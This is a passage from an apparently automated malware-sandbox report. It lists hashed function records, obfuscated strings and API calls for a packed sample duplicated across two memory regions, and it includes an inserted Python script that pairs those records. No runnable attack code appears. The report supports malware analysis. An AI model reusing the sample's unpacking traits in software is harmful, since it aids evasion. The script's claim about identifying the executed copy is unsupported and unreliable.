                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
                                                                                                                                                                                                                                                                        • API String ID: 0-2309992716
                                                                                                                                                                                                                                                                        • Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                                                                                                                                                                                        • Instruction ID: 8572baf30d401bcb74ca6cad787bf5c623c23a3ebd3a496303d547362f6a391e
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0361186154C3C69AD3118F3988A07AAFFE09FA3310F18496DE5D18B3D2D379CA4AD716
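Several of the records above describe the same function twice: once in the mapped image at 0x400000 (based on PE: true) and once in the runtime-allocated region at 0x710000 (based on PE: false), with an identical String ID and string hash. That duplication is what the "Detected unpacking" signatures in the overview are built on. The script below is an added example, not Joe Sandbox code or part of this report: it reads the record layout as it appears on this page (Source File, API ID, String ID, API String ID, Instruction Fuzzy Hash, and the API call bullets), treats the Instruction Fuzzy Hash line as the end of a record because that is where each record on the page ends, and pairs records whose string-hash half of the API String ID recurs at more than one dump base. The sample input is copied from records above and trimmed to the fields the parser uses; the header-less layout and the parsing rules are this example's assumptions.

```python
"""Pair Joe Sandbox IDA-plugin function records across memory dumps.

Added example, not Joe Sandbox code. Field names are those visible in the
report; splitting records on "Instruction Fuzzy Hash" is this script's
assumption about the page layout, not a documented format.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample: lines copied from records above, trimmed to the fields
# used here. Bare section headers (Strings, APIs, Similarity) are omitted;
# the parser would ignore them anyway.
SAMPLE = """\
• FreeLibrary.KERNEL32(?), ref: 0041A6BD
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
• API ID: FreeLibrary
• String ID: / $/,-$46
• API String ID: 3664257935-479303636
• Instruction Fuzzy Hash: 4CB26876648350AFE3208B95E88477BBBE2EBD5300F1CC82DE9D49B211D7799C458B93
  • Part of subcall function 0043C1F0: LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
• FreeLibrary.KERNEL32(?), ref: 0041A6BD
• FreeLibrary.KERNEL32(?), ref: 0041A77B
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID: FreeLibrary$InitializeThunk
• String ID: / $/,-$46
• API String ID: 764372645-479303636
• Instruction Fuzzy Hash: 9EB247766493009FE3208BA5D8847ABBBD2EBC5310F18D42EE9D497311D7789C858B9B
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
• API ID:
• String ID: 1]_$:;$}JsE$}JsE$AC$E)G$Q?S
• API String ID: 0-2463461626
• Instruction Fuzzy Hash: C3D1477264D7549BC324CF28C8516ABBBE2EFC1304F1D896DE4D58B385D639C94ACB82
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID:
• String ID: 1]_$:;$}JsE$}JsE$AC$E)G$Q?S
• API String ID: 0-2463461626
• Instruction Fuzzy Hash: 29D1497665C3548BD324CF2488516ABBBE2EBC1304F1D897EE4D69B381D638C916CB87
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID: Clipboard$Global$CloseDataLockOpenUnlock
• String ID:
• API String ID: 1006321803-0
• Instruction Fuzzy Hash: 855102F1D08A828FD700AF78C54936EFFA0AB15310F04863ED89597392D3BCA9598797
"""

KEY_RE = re.compile(r"^•\s*(?P<key>API ID|String ID|API String ID|Instruction Fuzzy Hash|Source File):\s*(?P<val>.*)$")
CALL_RE = re.compile(r"^•\s*(?:Part of subcall function [0-9A-Fa-f]+:\s*)?(?P<api>\w+)\.(?P<mod>\w+)\(.*\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(r"Offset:\s*(?P<off>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)")


@dataclass
class FuncRecord:
    offset: int = 0            # dump base address from the Source File line
    based_on_pe: bool = False  # false marks a region not backed by the PE image
    api_id: str = ""
    string_id: str = ""
    api_hash: str = "0"        # left half of API String ID ("0" = no APIs)
    string_hash: str = "0"     # right half of API String ID ("0" = no strings)
    insn_fuzzy: str = ""
    calls: list = field(default_factory=list)  # (module, api, ref) tuples


def parse_records(text):
    """Line-oriented parse; a record closes at its Instruction Fuzzy Hash line."""
    records, cur = [], FuncRecord()
    for raw in text.splitlines():
        line = raw.strip()
        m = CALL_RE.match(line)
        if m:
            cur.calls.append((m["mod"], m["api"], m["ref"]))
            continue
        m = KEY_RE.match(line)
        if not m:
            continue
        key, val = m["key"], m["val"].strip()
        if key == "Source File":
            s = SRC_RE.search(val)
            if s:
                cur.offset, cur.based_on_pe = int(s["off"], 16), s["pe"] == "true"
        elif key == "API ID":
            cur.api_id = val
        elif key == "String ID":
            cur.string_id = val
        elif key == "API String ID":
            cur.api_hash, _, cur.string_hash = val.partition("-")
        else:  # Instruction Fuzzy Hash: last field of a record on the page
            cur.insn_fuzzy = val
            records.append(cur)
            cur = FuncRecord()
    return records


def pair_across_dumps(records):
    """Functions whose string set recurs at more than one dump base.

    Records with string hash "0" carry no strings and cannot be paired this way.
    same_api_set is False when the copies resolved different APIs, as the
    FreeLibrary pair does (only the 0x400000 copy shows LdrInitializeThunk)."""
    by_strings = defaultdict(list)
    for r in records:
        if r.string_hash != "0":
            by_strings[r.string_hash].append(r)
    pairs = []
    for h, rs in sorted(by_strings.items()):
        bases = sorted({r.offset for r in rs})
        if len(bases) < 2:
            continue
        pairs.append({
            "string_hash": h,
            "string_id": rs[0].string_id,
            "bases": [f"0x{b:08X}" for b in bases],
            "api_ids": sorted({r.api_id for r in rs}),
            "same_api_set": len({r.api_hash for r in rs}) == 1,
        })
    return pairs


if __name__ == "__main__":
    for p in pair_across_dumps(parse_records(SAMPLE)):
        note = "identical API set" if p["same_api_set"] else "API set differs: " + " | ".join(p["api_ids"])
        print(f"strings {p['string_hash']} at {', '.join(p['bases'])} ({note})")
```

Run against a full function list pasted from the report, the pairs with `same_api_set` False are the interesting ones: the copy in the allocated region and the copy in the image were disassembled with different import resolution, so comparing their Instruction Fuzzy Hashes side by side shows which copy the sandbox saw executing after the PE header was overwritten.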
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
• API String ID: 0-2309992716
                                                                                                                                                                                                                                                                        • Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                                                                                                                                                                                        • Instruction ID: 26eceaee55227743b306782b87e7b3b011f3ad886b5b359efa5fd428808e0ec2
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F661F37164D3C68AD3118F3988A076BFFE09FA3310F18497EE4D05B382D7798A09975A
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: #4<7$+8=>$PK$Tiec$\$r
                                                                                                                                                                                                                                                                        • API String ID: 0-1906979145
                                                                                                                                                                                                                                                                        • Opcode ID: eb9bb64c8f79c1854ab48af47ab7cc54b735788ac4fdc3cb149e9e4095002922
                                                                                                                                                                                                                                                                        • Instruction ID: de92fa5aec5632ffffafdb5cc8ea92f235cefcfbc222fb895bddfebf8e38eaba
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: eb9bb64c8f79c1854ab48af47ab7cc54b735788ac4fdc3cb149e9e4095002922
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BED13676A0C3409BD318CF39C8516ABBBE1EFD1318F18892DE5D69B291D738C946CB46
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: #4<7$+8=>$PK$Tiec$\$r
                                                                                                                                                                                                                                                                        • API String ID: 0-1906979145
                                                                                                                                                                                                                                                                        • Opcode ID: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
                                                                                                                                                                                                                                                                        • Instruction ID: 6053270823643479f5a9008bd7dab94ee1cb24749ea6a1c2bb59c6b2eb0b3cac
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29D12476A087409BD318CF35C85166BBBE2EBD1318F18893DE5E69B391D738C905CB46
                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00718B83
                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00718B8C
                                                                                                                                                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00718C42
                                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 00718C9A
                                                                                                                                                                                                                                                                          • Part of subcall function 0071C7B7: CoInitializeEx.COMBASE(00000000,00000002), ref: 0071C7CA
                                                                                                                                                                                                                                                                          • Part of subcall function 0071B5F7: FreeLibrary.KERNEL32(00718D1F), ref: 0071B5FD
                                                                                                                                                                                                                                                                          • Part of subcall function 0071B5F7: FreeLibrary.KERNEL32 ref: 0071B61E
                                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00718D38
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                        • API String ID: 3072701918-0
                                                                                                                                                                                                                                                                        • Opcode ID: a98a3e3c2a5f1b0f673359f816fa1806a79807cb3814a0bc3f2413038ab882b7
                                                                                                                                                                                                                                                                        • Instruction ID: f1281dcf56ff8a275773f915b585066618728d2f759f2a525ab78855cb105386
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a98a3e3c2a5f1b0f673359f816fa1806a79807cb3814a0bc3f2413038ab882b7
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC5187B7F102180BD72CAEBDCC5A79975878BC9710F1E813D5945DB3D5EEB8880142D5
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: )G+I$+K M$B~B$|B$s0u
                                                                                                                                                                                                                                                                        • API String ID: 0-2670551875
                                                                                                                                                                                                                                                                        • Opcode ID: b0f283475cc496918f7695a9f64fd01b0ee276164c6e466a1bea6c055f4721cd
                                                                                                                                                                                                                                                                        • Instruction ID: a4cd9e1bca78e5d66c5ba9b7c65c08060f0057a840f0996e05fe944024406416
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b0f283475cc496918f7695a9f64fd01b0ee276164c6e466a1bea6c055f4721cd
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C321175A08350CFD714CF28E85072EBBE2BF8A314F194A7DE89957392D7349805CB9A
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: KT$Q$SV$p8`;$xy
                                                                                                                                                                                                                                                                        • API String ID: 0-2575762000
                                                                                                                                                                                                                                                                        • Opcode ID: 8208a9a5f85f4d31079f5f33de460df7d971af99579cab6366320c8ef0c9cde7
                                                                                                                                                                                                                                                                        • Instruction ID: 2255386f7330721b46ffdaf9979a2c90c406480ae86533e286d75d07a12c338b
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8208a9a5f85f4d31079f5f33de460df7d971af99579cab6366320c8ef0c9cde7
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9191FDB6A0C3549FD304DF56C84155FBBE2FFD5300F19896DE8C88B201EA35CA098B86
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
Similarity
• API ID:
• String ID: "$-+$/$hI
• API String ID: 0-2772680581
• Opcode ID: baaf34aebe6e111159d882b3926c0eef9b01d4c2baae1dbce7045adb7806651d
• Instruction ID: 80d069b9c3f3d42f340efb712ce7a676898f315fcf49a6f22f048e3d8e646fd9
• Opcode Fuzzy Hash: baaf34aebe6e111159d882b3926c0eef9b01d4c2baae1dbce7045adb7806651d
• Instruction Fuzzy Hash: 0F42257050C3A58FD721CF24D850A6EBBF1AF92314F188A7CE8E95B392D7398905CB56
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: "$-+$/$hI
• API String ID: 0-2772680581
• Opcode ID: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
• Instruction ID: 80b5f3405da4d7e7bc2228bbbe7299cc3933a4313a4431d55bf3dd64750ae482
• Opcode Fuzzy Hash: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
• Instruction Fuzzy Hash: 6442387850C3818FC725CF25C8506AFBBE1AF85314F044A6EE8D85B392D739D94ACB5A
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0u4w$_q$qr$xy
• API String ID: 0-1225007230
• Opcode ID: 0bc8e236467d41b4c844bc6f0c0f01b646d1471f34f8a440b90695bf15ccba6a
• Instruction ID: 8a956b4729cc2ed0a704aa9d49c2eaac9927c55bdcb23dd613342eb78b2278eb
• Opcode Fuzzy Hash: 0bc8e236467d41b4c844bc6f0c0f01b646d1471f34f8a440b90695bf15ccba6a
• Instruction Fuzzy Hash: 8A91E3B1908321CBC724DF58D89276BB7F1EF95324F18992CE8CA8B291E3789905C756
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID: ,JHj$Hs$bc$v
• API String ID: 0-909542228
• Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
• Instruction ID: d6b77cf9d590a59c4c03379e5e0a3c085cb03c82df5bfb0130d71a64ef4d19c1
• Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
• Instruction Fuzzy Hash: 83914972A0C3D08BE3358B3984517ABBBD29FE2314F19896DD4D99B382CB794805CB52
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: ,JHj$Hs$bc$v
• API String ID: 0-909542228
• Opcode ID: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
• Instruction ID: f210d87f6d5865ed1c617f00c3be5d3d578c02e4f21426ae5baa12ce733d6edf
• Opcode Fuzzy Hash: ad4b43c67400b0ccafcca15083408b2c8a4fed5129e88a914fecac855cc6ed9e
• Instruction Fuzzy Hash: C0919E71A1C3A08BE3358F3594517AFBBD2AFD3314F58896EC4C99B382C6794405CB96
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID: ,JHj$Hs$bc$v
• API String ID: 0-909542228
• Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
• Instruction ID: a44ee82977ab86a89107c33ed5e1b14e8f94d486a46a9f339a0777750f58c7cd
• Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
• Instruction Fuzzy Hash: F6915972A0C3D08BF3358B3984517ABBBD29FE3314F19896DD4D99B782CA794805CB52
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: ,JHj$Hs$bc$v
• API String ID: 0-909542228
• Opcode ID: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
• Instruction ID: ba8baf3debfb1281f5f3a9f4bb7f36b3e217b7d4f704efc08a24ef2861aa601e
• Opcode Fuzzy Hash: f1c18572ebcde3c507da4d01c59951efa700b1a2472cb7546e8eacdba262d522
• Instruction Fuzzy Hash: FA916D71A1C3A08BE3358F3594917AFBBD2AFD3314F58896DC4C94B382CA794405CB96
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
Yara matches
Similarity
• API ID:
• String ID: ,JHj$Hs$bc$v
• API String ID: 0-909542228
• Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
• Instruction ID: efb53fa5210bded6e299c2b347daee56f339b49cc48e6e1cf003f2b934225389
• Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
• Instruction Fuzzy Hash: 30916C72A083D08BE3358B3984517ABBBD29FE3314F19896DD4D99B682C7794805CB52
Strings
Memory Dump Source
• Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
Similarity
• API ID:
• String ID: ,JHj$Hs$bc$v
• API String ID: 0-909542228
                                                                                                                                                                                                                                                                        • Opcode ID: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                                                                                                                                                                                        • Instruction ID: f1dd0e060a49988aa5914a4bcfde423beaa814ce8563699fb3410ac54fff71cf
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d2c01644c1b783dc07337eb5961086e4655b708d6c2de64b3f2482e035b941c1
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 89918E71A1C3A08BE3358F3594517ABBFD2AFD3314F58896EC4C99B382C6794405CB96
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                                        • API String ID: 0-909542228
                                                                                                                                                                                                                                                                        • Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                                                                                                                                                                                        • Instruction ID: cf4f94e98106ef5d157703c3fcf9641a533eb60c063079f88624ae8c54e59d67
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 60814672A083D08BE3358B3988517ABBBD2AFE3304F19895DD4C95B686D7794809CB52
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: ,JHj$Hs$bc$v
                                                                                                                                                                                                                                                                        • API String ID: 0-909542228
                                                                                                                                                                                                                                                                        • Opcode ID: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                                                                                                                                                                                        • Instruction ID: 1e9c0ee7827ae846e03c62aab54aec301621c39cdfcdcbd3b33c3bf2ddd67d6a
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3d500b1000b7ad2bbd92419dc8dce251e5a9dd8a0e3fad46196f1295967bd69e
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B814871A1C3A08BE3358F3994517ABBFD2AFE3314F59896DC4C94B386C6784409CB96
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, Offset: 00710000, based on PE: false
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_710000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: /G$I$7N1@$Fg)i${\}
                                                                                                                                                                                                                                                                        • API String ID: 0-149357369
                                                                                                                                                                                                                                                                        • Opcode ID: f8d948a9f8c2ec87f02193c7bcc93b1dfc54c6f05a1ef69b06e5b5d54ec4d898
                                                                                                                                                                                                                                                                        • Instruction ID: 78ca7523c1c73b040ecc2725bfd2b8c4e43702c4e6d5fe5b339d539bc2903873
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f8d948a9f8c2ec87f02193c7bcc93b1dfc54c6f05a1ef69b06e5b5d54ec4d898
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 892188B551D3809BD318CF66884161BFBE2BBD2704F29A92DF0C85B255D7748902CF8B
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                                                        • String ID: ,$i$r}A
                                                                                                                                                                                                                                                                        • API String ID: 2994545307-2114006112
                                                                                                                                                                                                                                                                        • Opcode ID: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
                                                                                                                                                                                                                                                                        • Instruction ID: 71abf614919c99122684cd8b50d12f0618c33dd175a6392faed4f31dbac36a6d
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0e4b36d0337e01a9c7c8ce5630e9dd0ade0f1867cda4b4963c273f19514711e6
                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90427976A087508FD324CF69D8807ABBBE2EB96300F1D492ED4D5A7352C7389845C796
                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1716466461.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1716466461.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_NQbg5Ht2hW.jbxd
                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                        • String ID: gfff$i$r}A
                                                                                                                                                                                                                                                                        • API String ID: 0-3931832132
                                                                                                                                                                                                                                                                        • Opcode ID: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
                                                                                                                                                                                                                                                                        • Instruction ID: 86030a502c6fbeff1aeb5632b982c99bae1c365f88ce42af9c09e5b1275022bd
                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 63d4f06d283b13aa9aabc31ef275959d287b6dadcbde27f9351af1790c00577d
